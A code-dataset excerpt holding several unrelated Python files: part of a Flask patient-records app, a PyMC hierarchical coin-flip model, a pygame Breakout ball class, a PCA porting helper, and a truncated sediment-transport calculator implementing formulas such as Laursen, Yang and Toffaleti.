birthDate=patient.born_date.strftime(\"%Y-%m-%d\"),\r\n age=age, \r\n oms=patient.insurance_certificate,\r\n sex=patient.sex\r\n )\r\n\r\n photo_filename = f'./static/patient_images/{patient_id}.jpg'\r\n if os.path.exists(photo_filename):\r\n patient_data.photo_url = photo_filename\r\n\r\n return patient_data.__dict__\r\n\r\n#---------------------------------------DONE-4-------------------------------------------\r\n@app.route('/load_patient_history', methods=['GET'])\r\n@login_required\r\ndef load_patient_history():\r\n \"\"\"\r\n Получает список запросов для пациента по id пациента для указанной странице в пагинации.\r\n :param str patient_id: ID пациента.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком запросов для указанной страницы, которые включают id запроса, имя доктора, предсказанный диагноз, информацию о комментариях докторов(Без комментариев/Прокомментирован).\r\n \"\"\"\r\n patient_id = request.args.get('search')\r\n if patient_id == '':\r\n return\r\n patient_id = int(patient_id)\r\n page = int(request.args.get('page', '1'))\r\n\r\n per_page = 100\r\n\r\n requests = Request.get_requests_page_by_patient_id(patient_id, per_page)\r\n requests = [RequestData(id=request[0], \r\n name=request[1], \r\n date=request[2].strftime(\"%Y-%m-%d %H:%M:%S\"), \r\n diagnosis=request[3], \r\n is_commented=request[4]) for request in requests]\r\n\r\n return jsonify({'results': [request.__dict__ for request in requests], 'pagination': {'more': False}})\r\n\r\n\r\n#---------------------------------------DONE-5-------------------------------------------\r\n@socketio.on('add_comment')\r\n@authenticated_only\r\ndef add_comment(data):\r\n \"\"\"\r\n Добавляет новый комментарий для указанного запроса в БД.\r\n :param str request_id: ID запроса.\r\n :param str comment: Текст комментария.\r\n :return: JSON-ответ с информацией о комментарии, включая id комментария, имя доктора, время, текст комментария, является ли текущий пользователь автором.\r\n \"\"\"\r\n room_id = data['room_id']\r\n request_id = data['request_id']\r\n comment_text = data['comment']\r\n \r\n user_id = current_user.id\r\n comment_id = Comment.add(user_id, request_id, comment_text)\r\n Request.update_is_commented(request_id, 1)\r\n comment = Comment.get_by_id(comment_id)\r\n if comment:\r\n response = CommentResponseData(id=comment.id, \r\n doctor=current_user.name, \r\n time=comment.date.strftime(\"%Y-%m-%d %H:%M:%S\"), \r\n comment=comment_text)\r\n else:\r\n response = CommentResponseData()\r\n\r\n if user_id in connected_users:\r\n for sid in connected_users[user_id]:\r\n emit('self_added_comment', response.__dict__, to = sid)\r\n emit('added_comment', response.__dict__, room = room_id, skip_sid = list(connected_users[user_id]))\r\n\r\n#---------------------------------------DONE-6-------------------------------------------\r\n@socketio.on('delete_comment')\r\n@authenticated_only\r\ndef delete_comment(data):\r\n \"\"\"\r\n Удаляет комментарий по его id.\r\n :param int comment_id: ID комментария.\r\n :return: JSON-ответ с id комментария и именем текущего пользователя.\r\n \"\"\"\r\n try:\r\n room_id = data['room_id']\r\n request_id = data['request_id']\r\n comment_id = data['comment_id']\r\n\r\n user_id = current_user.id\r\n if not Comment.validate_comment_author(comment_id, user_id):\r\n raise\r\n\r\n Comment.update_status_by_id('OLD', comment_id)\r\n is_commented = Comment.is_request_commented(request_id)\r\n #Request.update_is_commented(request_id, is_commented) #в бд на это есть триггер, можно убрать\r\n doctor_name = current_user.name\r\n\r\n response = CommentResponseData(id=comment_id, doctor=doctor_name)\r\n emit('deleted_comment', response.__dict__, room = room_id)\r\n except:\r\n emit('delete_comment_error')\r\n\r\n\r\n#---------------------------------------TODO-7-------------------------------------------\r\n@socketio.on('edit_comment')\r\n@authenticated_only\r\ndef edit_comment(data):\r\n \"\"\"\r\n Изменяет комментарий по его id.\r\n :param int comment_id: ID комментария.\r\n :param str comment: Текст комментария.\r\n :return: JSON-ответ с информацией о комментарии, включая id комментария, имя доктора, время, текст комментария, является ли текущий пользователь автором.\r\n \"\"\"\r\n try:\r\n room_id = data['room_id']\r\n request_id = data['request_id']\r\n comment_id = data['comment_id']\r\n updated_comment_text = data['comment']\r\n\r\n user_id = current_user.id\r\n if not Comment.validate_comment_author(comment_id, user_id):\r\n raise\r\n\r\n Comment.update_status_by_id('OLD', comment_id)\r\n new_comment_id = Comment.add(user_id, request_id, updated_comment_text)\r\n\r\n comment = Comment.get_by_id(new_comment_id)\r\n if comment:\r\n response = CommentResponseData(id=comment.id, \r\n old_id=comment_id, \r\n doctor=current_user.name, \r\n time=comment.date.strftime(\"%Y-%m-%d %H:%M:%S\"), \r\n comment=comment.comment)\r\n else:\r\n response = CommentResponseData()\r\n user_id = current_user.id\r\n if user_id in connected_users:\r\n for sid in connected_users[user_id]:\r\n emit('self_edited_comment', response.__dict__, to = sid)\r\n emit('edited_comment', response.__dict__, room = room_id, skip_sid = list(connected_users[user_id]))\r\n except:\r\n emit('edit_comment_error')\r\n\r\n@app.route('/create_patient', methods=['POST'])\r\n@login_required\r\ndef create_patient():\r\n \"\"\"\r\n Создает нового пациента.\r\n :param str fullname: Имя пациента.\r\n :param str birthdate: Дата рождения.\r\n :param str oms: Полис ОМС пациента.\r\n :param image image: Изображение пациента.\r\n :return: JSON-ответ с информацией о пациенте, включая id пациента, имя пациента, Полис ОМС.\r\n \"\"\"\r\n fullname = request.form['fullname']\r\n birthdate = request.form['birthdate']\r\n birthdate = datetime.strptime(birthdate, '%d.%m.%Y')\r\n oms = request.form['oms']\r\n sex = request.form['sex']\r\n image = request.files.get('image')\r\n\r\n Patient.insert_new_patient(fullname, oms, birthdate, sex)\r\n id = Patient.get_id_by_insurance_certificate(oms)\r\n patient_data = PatientData(id=id, name=fullname, oms=oms)\r\n\r\n directory_path = './static/patient_images/'\r\n\r\n if not os.path.exists(directory_path):\r\n os.makedirs(directory_path)\r\n\r\n if image:\r\n image.save(os.path.join(directory_path, f'{id}.jpg'))\r\n\r\n return patient_data.__dict__\r\n\r\n\r\n@app.route('/load_patients', methods=['GET'])\r\n@login_required\r\ndef load_patients():\r\n \"\"\"\r\n :param str search: Фильтр.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком пациентов для указанной страницы, включая id пациента, имя, полис ОМС; также переменную more, указывающая о конце пагинации.\r\n \"\"\"\r\n term = request.args.get('search', '')\r\n page = int(request.args.get('page', 1))\r\n\r\n\r\n per_page = 100\r\n limit = 20\r\n \r\n if (len(term) > 3):\r\n patients = Patient.find_all_search_lazyload(term, per_page)\r\n else:\r\n patients = Patient.find_all_id_name_insurance_certificate(per_page)\r\n \r\n patients = [PatientData(id=patient[0], name=patient[1], oms=patient[2]) for patient in patients]\r\n\r\n return jsonify({'results': [patient.__dict__ for patient in patients], 'pagination': {'more': False}})\r\n\r\n@app.route('/load_symptoms', methods=['GET'])\r\n@login_required\r\ndef load_symptoms():\r\n \"\"\"\r\n :param str search: Фильтр.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком симптомов для указанной страницы, включая id симптома, название, также переменную more, указывающая о конце пагинации.\r\n \"\"\"\r\n filter = request.args.get('search', '').lower()\r\n page = int(request.args.get('page', 1))\r\n\r\n per_page = 10\r\n\r\n symptoms = Symptom.find_all_symptoms()\r\n symptoms = [SymptomData(id=item[0], name=item[1].lower()) for item in symptoms]\r\n\r\n if filter != '':\r\n symptoms = [row for row in symptoms if filter in row.name]\r\n\r\n start = (page - 1) * per_page\r\n end = start + per_page\r\n filtered_data = symptoms[start:end]\r\n\r\n return jsonify({'results': [symptom.__dict__ for symptom in filtered_data], 'pagination': {'more': len(filtered_data) == per_page}})\r\n\r\nif __name__ == \"__main__\":\r\n socketio.run(app, debug=True)\r\n","repo_name":"schneider001/MedAssistant","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20149,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19107831960","text":"\"\"\"\nBernoulli Likelihood with Hierarchical Prior!\n\"\"\"\nimport numpy as np\nimport pymc3 as pm\nimport sys\nfrom scipy.stats import beta, binom\nimport matplotlib.pyplot as plt\n\n\n# Data for figure 9.11\nN = [10, 10, 10] # Number of flips per coin\nz = [5, 5, 5] # Number of heads per coin\n## Data for figure 9.12\n#N = [10, 10, 10] # Number of flips per coin\n#z = [1, 5, 9] # Number of heads per coin\n\n## Data for exercise 9.1\n#ncoins = 50\n#nflipspercoin = 5\n#mu_act = .7\n#kappa_act = 20\n#theta_act = beta.rvs(mu_act*kappa_act+1, (1-mu_act)*kappa_act+1, size=ncoins)\n#z = binom.rvs(n=nflipspercoin, p=theta_act, size=ncoins)\n#N = [nflipspercoin] * ncoins\n\n\n# Arrange the data into a more convenient way to feed the PyMC model.\ncoin = [] # list/vector index for each coins (from 0 to number of coins)\ny = [] # list/vector with head (1) or tails (0) for each flip.\nfor i, flips in enumerate(N):\n heads = z[i]\n if heads > flips:\n sys.exit(\"The number of heads can't be greater than the number of flips\")\n else:\n y = y + [1] * heads + [0] * (flips-heads)\n coin = coin + [i] * flips\n\n\n# Specify the model in PyMC\nwith pm.Model() as model:\n# define the hyperparameters\n mu = pm.Beta('mu', 2, 2)\n kappa = pm.Gamma('kappa', 1, 0.1)\n # define the prior\n theta = pm.Beta('theta', mu * kappa, (1 - mu) * kappa, shape=len(N))\n # define the likelihood\n y = pm.Bernoulli('y', p=theta[coin], observed=y)\n\n# Generate a MCMC chain\n step = pm.Metropolis()\n trace = pm.sample(5000, step, progressbar=False)\n# Restricted models like this could be difficult to sample. This is related \n# to the censoring comment in the book. One way to detect that something is \n# wrong with the sampling is to compare the autocorrelation plot and the \n# sampled values under different sampler, or you can try combinations of \n# sampler like this\n\n# step1 = pm.Metropolis([theta, mu])\n# step2 = pm.Slice([kappa])\n# trace = pm.sample(5000, [step1, step2], progressbar=False)\n\n# or this (this combination was used to generate the figures)\n\n# start = pm.find_MAP()\n# step1 = pm.Metropolis([theta, mu])\n# step2 = pm.NUTS([kappa])\n# trace = pm.sample(5000, [step1, step2], start=start, progressbar=False)\n\n## Check the results.\nburnin = 2000 # posterior samples to discard\n\n## Print summary for each trace\n#pm.df_summary(trace[burnin:])\n#pm.df_summary(trace)\n\n## Check for mixing and autocorrelation\npm.autocorrplot(trace[burnin:], varnames=['mu', 'kappa'])\n#pm.autocorrplot(trace, varnames =[mu, kappa])\n\n## Plot KDE and sampled values for each parameter.\npm.traceplot(trace[burnin:])\n#pm.traceplot(trace)\n\n# Create arrays with the posterior sample\ntheta1_sample = trace['theta'][:,0][burnin:]\ntheta2_sample = trace['theta'][:,1][burnin:]\ntheta3_sample = trace['theta'][:,2][burnin:]\nmu_sample = trace['mu'][burnin:]\nkappa_sample = trace['kappa'][burnin:]\n\n\n# Scatter plot hyper-parameters\nfig, ax = plt.subplots(4, 3, figsize=(12,12))\nax[0, 0].scatter(mu_sample, kappa_sample, marker='o', color='skyblue')\nax[0, 0].set_xlim(0,1)\nax[0, 0].set_xlabel(r'$\\mu$')\nax[0, 0].set_ylabel(r'$\\kappa$')\n\n# Plot mu histogram\n#plot_post(mu_sample, xlab=r'$\\mu$', show_mode=False, labelsize=9, framealpha=0.5)\n\npm.plot_posterior(mu_sample, ax=ax[0, 1], color='skyblue')\nax[0, 1].set_xlabel(r'$\\mu$')\nax[0, 1].set_xlim(0,1)\n\n# Plot kappa histogram\n#plot_post(kappa_sample, xlab=r'$\\kappa$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(kappa_sample, ax=ax[0, 2], color='skyblue')\nax[0, 2].set_xlabel(r'$\\kappa$')\n\n# Plot theta 1\n\n#plot_post(theta1_sample, xlab=r'$\\theta1$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(theta1_sample, ax=ax[1, 0], color='skyblue')\nax[1, 0].set_xlabel(r'$\\theta1$')\nax[1, 0].set_xlim(0,1)\n\n# Scatter theta 1 vs mu\nax[1, 1].scatter(theta1_sample, mu_sample, marker='o', color='skyblue')\nax[1, 1].set_xlim(0,1)\nax[1, 1].set_ylim(0,1)\nax[1, 1].set_xlabel(r'$\\theta1$')\nax[1, 1].set_ylabel(r'$\\mu$')\n\n# Scatter theta 1 vs kappa\nax[1, 2].scatter(theta1_sample, kappa_sample, marker='o', color='skyblue')\nax[1, 2].set_xlim(0,1)\nax[1, 2].set_xlabel(r'$\\theta1$')\nax[1, 2].set_ylabel(r'$\\kappa$')\n\n# Plot theta 2\n#plot_post(theta2_sample, xlab=r'$\\theta2$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(theta2_sample, ax=ax[2, 0], color='skyblue')\nax[2, 0].set_xlabel(r'$\\theta2$')\nax[2, 0].set_xlim(0,1)\n\n# Scatter theta 2 vs mu\nax[2, 1].scatter(theta2_sample, mu_sample, marker='o', color='skyblue')\nax[2, 1].set_xlim(0,1)\nax[2, 1].set_ylim(0,1)\nax[2, 1].set_xlabel(r'$\\theta2$')\nax[2, 1].set_ylabel(r'$\\mu$')\n\n# Scatter theta 2 vs kappa\nax[2, 2].scatter(theta2_sample, kappa_sample, marker='o', color='skyblue')\nax[2, 2].set_xlim(0,1)\nax[2, 2].set_xlabel(r'$\\theta2$')\nax[2, 2].set_ylabel(r'$\\kappa$')\n\n# Plot theta 3\n\n#plot_post(theta3_sample, xlab=r'$\\theta3$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(theta3_sample, ax=ax[3, 0], color='skyblue')\nax[3, 0].set_xlabel(r'$\\theta3$')\nax[3, 0].set_xlim(0,1)\n\n# Scatter theta 3 vs mu\nax[3, 1].scatter(theta3_sample, mu_sample, marker='o', color='skyblue')\nax[3, 1].set_xlim(0,1)\nax[3, 1].set_ylim(0,1)\nax[3, 1].set_xlabel(r'$\\theta3$')\nax[3, 1].set_ylabel(r'$\\mu$')\n\n# Scatter theta 3 vs kappa\nax[3, 2].scatter(theta3_sample, kappa_sample, marker='o', color='skyblue')\nax[3, 2].set_xlim(0,1)\nax[3, 2].set_xlabel(r'$\\theta3$')\nax[3, 2].set_ylabel(r'$\\kappa$')\n\nplt.tight_layout()\nplt.savefig('Figure_9.11.png')\nplt.show()\n\n","repo_name":"jiguang123/PythonProject-JobSeaking","sub_path":"Data-Analysis/09_BernBetaMuKappaPyMC.py","file_name":"09_BernBetaMuKappaPyMC.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4435197376","text":"import pygame\n\nclass Ball ():\n MAX_VEL = 5\n\n def __init__(self, game):\n self.game = game\n self.radius = 5\n self.pos_x = 0\n self.pos_y = 0\n self.hitbox = pygame.Rect(self.pos_x, self.pos_y, self.radius, self.radius)\n self.hitbox.center = self.pos_x, self.pos_y\n\n self.vel_x = 0\n self.vel_y = -5\n self.sticky = True\n\n def draw(self):\n self.hitbox.center = self.pos_x, self.pos_y\n pygame.draw.circle(self.game.win, \"green\",\n (self.pos_x, self.pos_y), self.radius)\n\n def move(self):\n if self.sticky:\n self.pos_x = self.game.player.pos_x\n self.pos_y = self.game.player.pos_y - self.game.player.height//2 - self.radius\n else:\n # Collision with celing\n if self.pos_y - self.radius <= 0:\n self.vel_y *= -1\n # Collision with paddle\n if self.pos_x >= self.game.player.shape.topleft[0] and \\\n self.pos_x <= self.game.player.shape.topright[0] and \\\n (self.pos_y >= self.game.player.shape.topright[1] - self.radius + 1 and self.pos_y < self.game.player.shape.center[1]):\n self.vel_y *= -1\n difference_x = self.game.player.pos_x - self.pos_x\n reduction_factor = (self.game.player.width // 2) / self.MAX_VEL\n self.vel_x = -difference_x / reduction_factor\n\n # Collision with walls\n if self.pos_x - self.radius <= 0 or self.pos_x + self.radius >= self.game.WIDTH:\n self.vel_x *= -1\n\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y","repo_name":"antono91/breakout","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20193166350","text":"from micromlgen.utils import jinja, check_type\n\n\ndef is_pca(clf):\n \"\"\"Test if classifier can be ported\"\"\"\n return check_type(clf, 'PCA')\n\n\ndef port_pca(clf, **kwargs):\n \"\"\"Port a PCA\"\"\"\n return jinja('pca/pca.jinja', {\n 'arrays': {\n 'components': clf.components_,\n 'mean': clf.mean_\n },\n }, {\n 'classname': 'PCA'\n }, **kwargs)","repo_name":"KaspiElectronics/CircuitML","sub_path":"circuitml/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"38507813456","text":"from PyQt4 import QtGui, QtCore # Import the PyQt4 module we'll need\nimport sys # We need sys so that we can pass argv to QApplication\nimport inspect\nimport xlsxwriter\nimport os\n\nimport design # This file holds our MainWindow and all design related things\n # it also keeps events etc that we defined in Qt Designer\n\nimport math\n\ndef FNL(x):\n return math.log(x,10)\n\ndef WriteResultsFaixa(FormulaName, ResultFormula, ib, Fgranlabel, row, sheetSInt, sheetSIng, faixa):\n if faixa == 1:\n sheetSInt.write(row, 0, FormulaName)\n sheetSIng.write(row, 0, FormulaName)\n row+=1\n sheetSInt.write(row, 0, 'Faixa Gran (mm)')\n sheetSIng.write(row, 0, 'Faixa Gran (mm)')\n\n sheetSInt.write(row, 1, 'Fracao (%)')\n sheetSIng.write(row, 1, 'Fracao (%)')\n \n sheetSInt.write(row, 2, 'C (mg/l)')\n sheetSIng.write(row, 2, 'C (mg/l)')\n \n #sheetSInt.write(row, 3, 'Qs (ton/dia/m)')\n sheetSInt.write(row, 3, 'Qst (t/dia)')\n \n #sheetSIng.write(row, 3, 'Qs (lb/s/ft)')\n sheetSIng.write(row, 3, 'Qst (ton/dia)')\n row+=1\n\n for ci, qst, i, fg in zip(ResultFormula[3], ResultFormula[4], ib, Fgranlabel):\n sheetSInt.write(row, 0, fg)\n sheetSInt.write(row, 1, i*100)\n sheetSInt.write(row, 2, ci)\n #sheetSInt.write(row, 3, qst*43.2/0.3048)\n\n sheetSIng.write(row, 0, fg)\n sheetSIng.write(row, 1, i*100)\n sheetSIng.write(row, 2, ci)\n #sheetSIng.write(row, 3, qst)\n row+=1\n\n sheetSInt.write(row, 0, \"Total\")\n sheetSInt.write(row, 1, 100.0*sum(ib)) \n sheetSInt.write(row, 2, ResultFormula[0])\n #sheetSInt.write(row, 3, ResultFormula[1]*43.2/0.3048)\n sheetSInt.write(row, 3, ResultFormula[2])\n\n \n sheetSIng.write(row, 0, \"Total\")\n sheetSIng.write(row, 1, \"100\")\n sheetSIng.write(row, 2, ResultFormula[0])\n #sheetSIng.write(row, 3, ResultFormula[1])\n sheetSIng.write(row, 3, ResultFormula[2])\n row+=2\n else:\n sheetSInt.write(row, 0, FormulaName)\n sheetSIng.write(row, 0, FormulaName)\n row+=1\n sheetSInt.write(row, 0, 'C (mg/l)')\n sheetSIng.write(row, 0, 'C (mg/l)')\n \n #sheetSInt.write(row, 1, 'Qs (ton/dia/m)')\n sheetSInt.write(row, 1, 'Qst (t/dia)')\n \n #sheetSIng.write(row, 1, 'Qs (lb/s/ft)')\n sheetSIng.write(row, 1, 'Qst (ton/dia)')\n row+=1\n \n sheetSInt.write(row, 0, ResultFormula[0])\n #sheetSInt.write(row, 1, ResultFormula[1]*43.2/0.3048)\n sheetSInt.write(row, 1, ResultFormula[2])\n\n sheetSIng.write(row, 0, ResultFormula[0])\n #sheetSIng.write(row, 1, ResultFormula[1])\n sheetSIng.write(row, 1, ResultFormula[2])\n row+=2\n return row\n\ndef FallVelocity(D, TEMP, AF):\n DFV = D * 304.8\n SF = TEMP / 10.0\n KT = int(SF)+1\n PT = SF - KT + 1\n DL = FNL(DFV)\n M = 0\n while DFV > AF[0][M]:\n M += 1\n M -=1\n CF = FNL(AF[0][M])\n EF = FNL(AF[0][M+1])\n PD = (DL - CF)/ (EF - CF)\n ZF = []\n for L in range(2):\n K = L + KT\n ZF.append((1 - PD) * FNL(AF[K][M]) + PD * FNL(AF[K][M + 1]))\n RF = (1.0 - PT) * ZF[0] + PT * ZF[1]\n FV = 10.0**RF / 30.48\n return FV\n\ndef Laursen(DFT, ib, V, SG, g, Y, XNU, U, DF50, W):\n UGS=0\n C = 0 \n COMP1 = 6*XNU\n CList = []\n UGSList = []\n for D, i in zip(DFT[1:], ib[1:]):\n DELTA = 11.6*XNU/U\n FVI = (math.sqrt(36.064*D**3+COMP1**2)-COMP1)/D\n RV = U/FVI\n\n RVL = FNL(RV)\n if RV < 0.3:\n FV = 10.718*RV**0.243\n elif RV < 3.0:\n FV = 10.0**(0.855*RVL+0.62*RVL**2+1.2)\n elif RV < 20:\n FV = 4.773*RV**2.304\n elif RV < 200:\n FV = 10.0**(3.764*RVL-0.803*RVL**2+0.147)\n else:\n FV = 9680.5*RV**0.2531 \n \n RY = D/DELTA\n if RY > 0.1:\n Yc = 0.04\n elif RY < 0.03:\n Yc = 0.16\n else:\n Yc = 0.08\n \n F1 =(D/Y)**1.1667\n F2 = V**2.0/(58.0*Yc*D*(SG-1.0)*g)\n F3 =(DF50/Y)**0.3333\n \n CI = 10000.0*i*F1*(F2*F3-1.0)*FV\n \n if CI < 0:\n CI = 0\n\n UGS = UGS + 0.0000625*CI*Y*V\n\n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n \n C = 16000.0 * UGS/(Y*V)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n\ndef EngelundeHansen (GMS, V, S, DF50, g, SG, W, Y):\n UGS = 0.05*GMS*V**2*Y**1.5*S**1.5/(DF50*g**0.5*(SG-1)**2.0)\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W] \n\ndef Colby (DF50, Y, V, CY, CF, W, TEMP):\n D50 = DF50 * 304.8\n \n if D50 <= 0.1 or D50 >=0.8:\n print('Outside range of validity')\n return -1\n \n VC = 0.4673 * (Y ** 0.1) * (D50 ** 0.333)\n DIFF = V * 0.3048 - VC\n B = 2.5\n \n if DIFF >= 1.0:\n B = 1.453*D50**(-0.138)\n \n X = FNL(Y)\n \n N = 0\n while TEMP >= CY[3][N]:\n N = N + 1\n \n F1 = CY[4][N-1] + CY[5][N-1] * X + CY[6][N-1] * X ** 2.0\n F2 = CY[4][N] + CY[5][N] * X + CY[6][N] * X ** 2.0\n AF = F1 + (F2 - F1) * (FNL(TEMP)-FNL(CY[3][N-1])) / (FNL(CY[3][N])-FNL(CY[3][N-1]))\n AF = 10 ** AF\n \n N = 0 \n while D50 > CY[0][N]:\n N = N + 1\n\n A = CY[2][N-1]*Y**(CY[1][N-1]) \n F1 = A * DIFF ** B * (1.0 + (AF - 1.0) * CF[N-1]) * 0.672\n \n A = CY[2][N] *Y**(CY[1][N])\n F2 = A * DIFF ** B * (1.0 + (AF - 1.0) * CF[N]) * 0.672\n\n UGS = FNL(F1) + (FNL(F2)-FNL(F1)) * (FNL(D50)-FNL(CY[0][N-1]))/(FNL(CY[0][N])-FNL(CY[0][N-1]))\n UGS = 10.0**UGS\n \n C = 16000.0 * UGS/(Y*V)\n \n return [C, UGS, UGS*43.2*W]\n\ndef AckersWhite(D, g, SG, XNU, U, V, Y, W):\n DGR = D * ((g*(SG-1)/XNU**2)**0.3333)\n P = FNL(DGR)\n if DGR <= 60.0:\n AN = 1.0 - 0.56 * P\n AA = 0.23/math.sqrt(DGR)+0.14\n AM = 9.66/DGR + 1.34\n CA = 2.86 * P - P **2 - 3.53\n CA = 10.0 ** CA\n else:\n AN = 0.0\n AA = 0.17\n AM = 1.5\n CA = 0.025\n F1 = U**AN/(math.sqrt(g*D*(SG-1)))\n F2 = (V/(math.sqrt(g)*FNL(10*Y/D)))**(1.0-AN)\n F3 = F1*F2/AA-1.0\n if F3 > 0.0:\n GGR = CA * F3 ** AM\n C = (GGR*D*SG*(V/U)**AN)/Y\n C = C * 10.0**6\n UGS = 0.0000625*C*Y*V\n return [C, UGS, UGS*43.2*W]\n else:\n print(\"Concentracao menor que zero\")\n return -1\n\ndef YangD50(SoilType, FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W):\n FV = FV50\n if DF50 < 0.0328:\n D = DF50\n FV = FallVelocity(D, TEMP, AF) \n R = U * DF50 / XNU\n F1 = 2.05\n if R < 70:\n F1 = 0.66 + 2.5/ (FNL(R) - 0.06)\n F2 = FNL(FV*DF50/XNU)\n F3 = FNL(U/FV)\n F4 = V * S / FV - F1 * S\n if F4 > 0:\n if SoilType == 'Sand':\n C = 5.435 - 0.286 * F2 - 0.457 * F3 + (1.799 - 0.409 * F2 - 0.314 * F3) * FNL(F4) #Sand\n elif SoilType == 'Gravel':\n C = 6.681 - 0.633 * F2 - 4.816 * F3 + (2.784 - 0.305 * F2 - 0.282 * F3) * FNL(F4) #Gravel\n else:\n print('Wrong soil type.')\n C = 0.0\n else:\n C = 0\n C = 10.0**C\n UGS = 0.0000625*C*Y*V\n return [C, UGS, UGS*43.2*W]\n\ndef YangFT(SoilType, ib, DFT, TEMP, AF, XNU, U, V, S, Y, W):\n C = 0\n UGS = 0\n CList = []\n UGSList = []\n for i in range(1,11):\n if ib[i] > 0:\n D = DFT[i]\n if D < 0.0328:\n FV = FallVelocity(D, TEMP, AF)\n else:\n COMP1 = 6* XNU\n FV = (math.sqrt(36.064*D**3+COMP1**2)-COMP1)/D\n R = U*D/XNU\n F1 = 2.05\n if R < 70:\n F1 = 0.66 + 2.5 / (FNL(R) - 0.06)\n F2 = FNL(FV*D/XNU)\n F3 = FNL(U/FV)\n CI = 0\n F4 = V*S/FV-F1*S\n if F4 > 0:\n if SoilType == 'Gravel' or (SoilType == 'Mixture' and i>5):\n CI = 6.681-0.633*F2-4.816*F3+(2.784-0.305*F2-0.282*F3)*FNL(F4)\n else:\n CI = 5.435-0.286*F2-0.457*F3+(1.799-0.409*F2-0.314*F3)*FNL(F4)\n CI = 10**CI * ib[i]\n C += CI\n UGSI = 0.0000625*CI*Y*V\n UGS += UGSI\n \n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n else:\n CList.append(0.0)\n UGSList.append(0.0)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n \ndef Schoklitsch(DFT, ib, S, Y, V, W):\n UGS=0\n CI = 0\n CList = []\n UGSList = []\n for D, i in zip(DFT, ib):\n F1 = 25.0* S**1.5 *Y*V\n F2 = 1.6 * S**0.17\n F3 = math.sqrt(D)\n X = F1/F3 - F2*F3\n if X <= 0:\n UGSI = 0\n else:\n UGSI = i * X\n \n UGS = UGS + UGSI\n \n CI = 16000.0 * UGSI/(Y*V)\n \n CList.append(CI)\n UGSList.append(UGSI)\n \n C = 16000.0 * UGS/(Y*V)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n\ndef Kalinske(DFT, ib, AK0, AK1, AK2, AK3, AK4, AK5, Y, V, S, W):\n S1 = 0\n TEMP2 = []\n CList = []\n UGSList = []\n for D, i in zip(DFT, ib):\n TEMP2.append(i/D)\n S1 += i/D\n C = 0\n UGS = 0\n T0 = 62.4 * Y * S\n F1 = 25.28 * T0**0.5 / S1\n for D, i, t in zip(DFT, ib, TEMP2):\n if i > 0:\n T1 = 12 * D\n X = T1 / T0\n F2 = AK0 + AK1 * X + AK2*X**2 + AK3 * X**3 + AK4*X**4 + AK5*X**5\n F2 = 10**F2\n UGSI = F1 * T1 * t * F2\n UGS = UGS + UGSI\n CI = 16000.0 * UGSI / (Y * V)\n C = C + CI\n \n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n else:\n CList.append(0.0)\n UGSList.append(0.0)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n \ndef MeyerPetereMuller (DF90, Dm, Y, V, S, W):\n D90 = DF90 * 304.8\n nM = (1.486*Y**(0.667)* S**0.5)/V\n QsQ = 1\n F1= 0.368*QsQ*(D90**(1.0/6.0)/nM)**1.5*Y*S - 0.0698*Dm\n UGS= abs(F1)**1.5\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W]\n\ndef RottnerOld(GMS, SG, g, Y, V, DF50, W):\n termo1 = GMS*math.sqrt((SG-1.0)*g*Y**3.0)\n termo2 = (V/math.sqrt((SG-1.0)*g*Y) * (0.667*(DF50/Y)**1.5 + 0.14) - 0.778*(DF50/Y)**1.5)**3.0\n UGS = termo1*termo2\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W]\n\ndef Rottner(GMS, SG, g, Y, V, DF50, W):\n R = (DF50/Y)**0.667\n F1 = V/(7.286*math.sqrt(Y))\n F2 = 0.667*R + 0.14\n UGS = 1204.8 * Y**1.5 * (F1*F2-0.778*R)**3\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W]\n\ndef Toffaleti(TEMP, Y, S, V, DF65, g, XNU, DFT, DIP, ib, AF, NLD, W):\n TDF = 1.8*TEMP+32.0\n ZV = 0.1198+0.00048*TDF\n CZ = 260.67-0.667*TDF\n YA = Y / 11.24\n YB = Y / 2.5\n CV = 1.0 + ZV\n SI = S * Y * CZ\n U3 = V**3/(XNU*g*S)\n U2 = V/math.sqrt(DF65*g*S)\n F1 = math.log(U3)\n F2 = 4.083*math.log(U2)-3.76\n F3 = 1.864 * F1 - 9.09\n\n CList = []\n UGSList = []\n \n if F3 < F2:\n U1 = F3\n else: \n FI = (F2+9.09)/1.864\n FI = (F1 - FI)*0.43429\n if FI >= 1.7:\n U1 = F2 + 0.4\n else:\n F6 = FI * 10.0\n for F5 in range(1,18):\n F1 = F5 - F6\n if F5 < F6:\n continue \n J = F5-1\n F1 = 1.0 - F1\n F5 = DIP[J]+F1*(DIP[J+1]-DIP[J])\n U1 = F2 + F5\n \n AM = 10.0 * V / U1 \n PAM = ((XNU * 100000)**0.3333)/AM\n F1 = 100000 * PAM * S * DF65/g\n T = (0.051 + 0.00009*TDF)*1.1\n 